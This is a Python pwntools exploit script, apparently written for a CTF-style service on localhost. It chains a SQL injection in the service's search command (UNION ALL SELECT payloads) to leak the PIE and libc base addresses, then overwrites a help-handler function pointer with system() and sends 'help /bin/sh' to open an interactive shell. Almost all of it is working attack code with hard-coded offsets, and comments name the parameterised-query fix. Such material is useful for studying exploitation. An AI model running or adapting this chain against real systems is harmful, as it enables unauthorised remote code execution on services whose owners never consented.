write up of todos
from pwn import *
import struct
from time import sleep
# XXX: use your libc address
# Every constant below is specific to one build of the target binary and the
# libc it was run against; the nm-style lines and the gdb ``telescope`` dump
# are the reference the values were read from.  Different builds need
# different numbers -- the script cannot discover them on its own.
#0000000000021dd0 T __libc_start_main
libc_start_main_offset = 0x21dd0  # offset of __libc_start_main inside libc
#0000000000046530 W system
libc_system_offset = 0x46530  # offset of system inside libc
#$ telescope 0x7f3d20ce1168+0xa00
#0000| 0x7f3d20ce1b68 --> 0x0
#0008| 0x7f3d20ce1b70 --> 0x3
#0016| 0x7f3d20ce1b78 --> 0x7f3d20ae01dc --> 0x6c656800706c6568 ('help')
#0024| 0x7f3d20ce1b80 --> 0x7f3d20ae0162 --> 0x2f7665642f007200 ('')
#0032| 0x7f3d20ce1b88 --> 0x7f3d20adf7a0 (push rbp)
#0040| 0x7f3d20ce1b90 --> 0x7f3d20ae01e1 ("help: Print this help screen")
#0048| 0x7f3d20ce1b98 --> 0x0
#0056| 0x7f3d20ce1ba0 --> 0x7f3d221bf120 --> 0x7f3d221bf210 --> 0x0
#[+]PIE Base Address: 0x7f3d20ade000
# Offsets relative to the PIE base of the target binary.  The first three are
# the dump entries above minus the PIE base printed there
# (0x7f3d20ae01dc - 0x7f3d20ade000 == 0x21dc, etc.).
help_string_offset1 = 0x21dc  # address of the 'help' string
help_string_offset2 = 0x2162  # address of the empty string following it
do_help_offset = 0x17a0  # address of the help handler (the 'push rbp' entry)
libc_start_main_plt_pie = 0x203070  # GOT slot of __libc_start_main (not in the dump; see main())
func_offset = 0x19d0  # offset of the code pointer leaked via show(11) in main()
def rev(s):
    """Reverse the byte order of a 16-character hex string.

    The string is consumed two characters (one byte) at a time from the
    end, so ``'0011223344556677'`` becomes ``'7766554433221100'`` -- the
    little-endian spelling used when a value is embedded in a payload.
    Only the last 16 characters are ever looked at; the callers always pass
    ``'%016x'``-formatted values, for which that is the whole string.
    """
    # The final pair needs an open-ended slice (``s[-2:]``): ``s[-2:-0]``
    # would be empty.  Every other pair is a plain two-character window.
    tail = s[-2:]
    pairs = [s[-k - 2:-k] for k in range(2, 16, 2)]
    return tail + ''.join(pairs)
def main():
    """Drive the three-stage interaction with the service behind ``f``.

    Stage 1 leaks a code pointer through ``show`` and derives the PIE base
    from it; stage 2 leaks the address of ``__libc_start_main`` through
    ``help`` and derives the libc base; stage 3 plants the computed
    ``system`` address and hands the session to the user (``f.interactive``).

    Every payload is delivered by ``search_content``: the search string
    closes an open quote (``qqqq' ``) and appends ``UNION ALL SELECT``
    clauses, i.e. the service interpolates the search term straight into
    its SQL query.  The fix on the service side is a parameterised query;
    once the injection is closed none of the offsets above matter.

    Assumes ``f`` (a pwntools tube) exists as a module global and that the
    offsets at the top of the file match the target build; ``f.recvuntil``
    blocks forever if the expected marker never arrives.
    """
    # Presumably lets the service's banner arrive before the first command -- TODO confirm.
    sleep(0.5)
    login('sato', 'sato')
    print "[*]Stage 1 -- Leak PIE Base Address"
    # '0x' + hex digits forms a SQL hex literal; concat() of it yields the raw
    # bytes, and rev() spells the value little-endian (here 0xe as 8 bytes).
    payload1 = '0x'
    payload1 += rev('000000000000000e')
    sql1 = ""
    sql1 += "qqqq' "
    # Ten filler rows so the injected row lands at a known index (show(11) below) -- presumably; verify against the service.
    sql1 += "UNION ALL SELECT 'ZZZZ' " * 10
    sql1 += "UNION ALL SELECT concat({}); -- # ".format(payload1)
    search_content(sql1)
    show(11) # leak elf header
    f.recvuntil('11: ')
    # unpack('<Q') needs exactly 8 bytes: ljust() only pads, so anything longer
    # than 8 bytes surviving strip() raises struct.error -- TODO confirm the
    # leak is never longer than that.
    func_addr_str = f.recv(16).strip()
    func_addr = struct.unpack('<Q', func_addr_str.ljust(8, '\x00'))[0]
    pie_base = func_addr - func_offset
    libc_start_main_plt = pie_base + libc_start_main_plt_pie
    print "[+]Address"
    print " [+]func Address: {}".format(hex(func_addr))
    print " [+]PIE Base Address: {}".format(hex(pie_base))
    print " [+]libc_start_main got.plt Address: {}".format(hex(libc_start_main_plt))
    print "[*]Stage 2 -- Leak libc Base Address"
    # '%016x' always yields 16 hex digits for a 64-bit value, which is the
    # width rev() expects.
    help_string1 = '%016x' % (pie_base + help_string_offset1)
    help_string2 = '%016x' % (pie_base + help_string_offset2)
    do_help = '%016x' % (pie_base + do_help_offset)
    libc_start_main_plt_str = '%016x' % libc_start_main_plt
    payload2 = '0x'
    payload2 += rev('000000000000000e')
    payload2 += rev('aaaaaaaabbbbbbbb')  # 8 bytes of filler
    payload2 += rev(help_string1) # 'help'
    payload2 += rev(help_string2) # ''
    payload2 += rev(do_help)
    # The GOT slot address stands in for the help text, so printing the help
    # entry reveals the slot's contents (the resolved __libc_start_main).
    payload2 += rev(libc_start_main_plt_str) # help content
    sql2 = ""
    sql2 += "qqqq' "
    sql2 += "UNION ALL SELECT 'ZZZZ' " * 10
    # NOTE: this terminator is "-- #" while stage 1 used "-- # " (trailing space).
    sql2 += "UNION ALL SELECT concat({}); -- #".format(payload2)
    search_content(sql2)
    help()
    f.recvuntil('Commands:\n')
    # [:-1] drops the trailing newline; the same 8-byte limit as above applies.
    libc_start_str = f.recvline()[:-1]
    libc_start_main = struct.unpack('<Q', libc_start_str.ljust(8, '\x00'))[0]
    libc_base = libc_start_main - libc_start_main_offset
    libc_system = libc_base + libc_system_offset
    print "[+]Address"
    print " [+]libc_start_main got addr: {}".format(hex(libc_start_main))
    print " [+]libc base addr: {}".format(hex(libc_base))
    print " [+]libc system addr: {}".format(hex(libc_system))
    print "[*]Stage 3 -- Exploit"
    libc_system_str = '%016x' % libc_system
    payload3 = '0x'
    payload3 += rev('000000000000000e')
    payload3 += rev('aaaaaaaabbbbbbbb')  # 8 bytes of filler
    payload3 += rev(help_string1) # 'help'
    payload3 += rev(help_string2) # ''
    # Same layout as payload2 but the handler slot now holds system's address.
    payload3 += rev(libc_system_str) # func pointer
    sql3 = ""
    sql3 += "qqqq' "
    sql3 += "UNION ALL SELECT 'ZZZZ' " * 10
    sql3 += "UNION ALL SELECT concat({}); -- #".format(payload3)
    search_content(sql3)
    # Sent raw rather than via help(): the argument is what the replaced
    # handler receives.
    f.send('help /bin/sh\n')
    print "[*]Shell"
    f.interactive()
def help():
    """Send the service's ``help`` command over the module-global tube ``f``.

    Shadows the builtin ``help()`` for the rest of this module.
    """
    command = 'help\n'
    f.send(command)
def show(num):
    """Send ``show <num>`` over ``f``; ``num`` is rendered with ``str()``."""
    line = 'show %s\n' % (str(num),)
    f.send(line)
def search_content(pattern):
    """Send ``search <pattern> \\n`` over ``f`` (note the space before the newline).

    ``pattern`` is inserted verbatim -- nothing is quoted or escaped here,
    so the caller controls exactly what the service receives.
    """
    line = 'search %s \n' % (pattern,)
    f.send(line)
def login(user, passwd):
    """Send ``login <user> <passwd>`` over ``f``.

    Both fields go out unmodified; values containing spaces or newlines
    would change how the service parses the line.
    """
    line = 'login %s %s\n' % (user, passwd)
    f.send(line)
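def register(user, passwd):
    """Send ``register <user> <passwd>`` over ``f``.

    The original used ``%s`` placeholders with ``str.format``, which never
    substitutes them: the literal text ``register %s %s`` was sent and both
    arguments were silently dropped.  ``{}`` placeholders fix that; the
    command shape now matches ``login``.
    """
    s = 'register {} {}\n'.format(user, passwd)
    f.send(s)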
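def add_content(content):
    """Send ``add <content>`` over ``f``.

    The original used a ``%s`` placeholder with ``str.format``, which never
    substitutes it: the literal text ``add %s`` was sent and ``content`` was
    silently dropped.  A ``{}`` placeholder fixes that, matching the other
    command helpers.
    """
    s = 'add {}\n'.format(content)
    f.send(s)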
if __name__ == '__main__':
    # ``f`` is the module-global tube every helper above writes to; it is
    # bound here, not inside main(), so the helpers can reach it by name
    # (importing this module therefore leaves ``f`` undefined).
    # The connection is never closed explicitly: main() ends in
    # f.interactive() and the process exits afterwards.
    f = remote('localhost', 12345)
    main()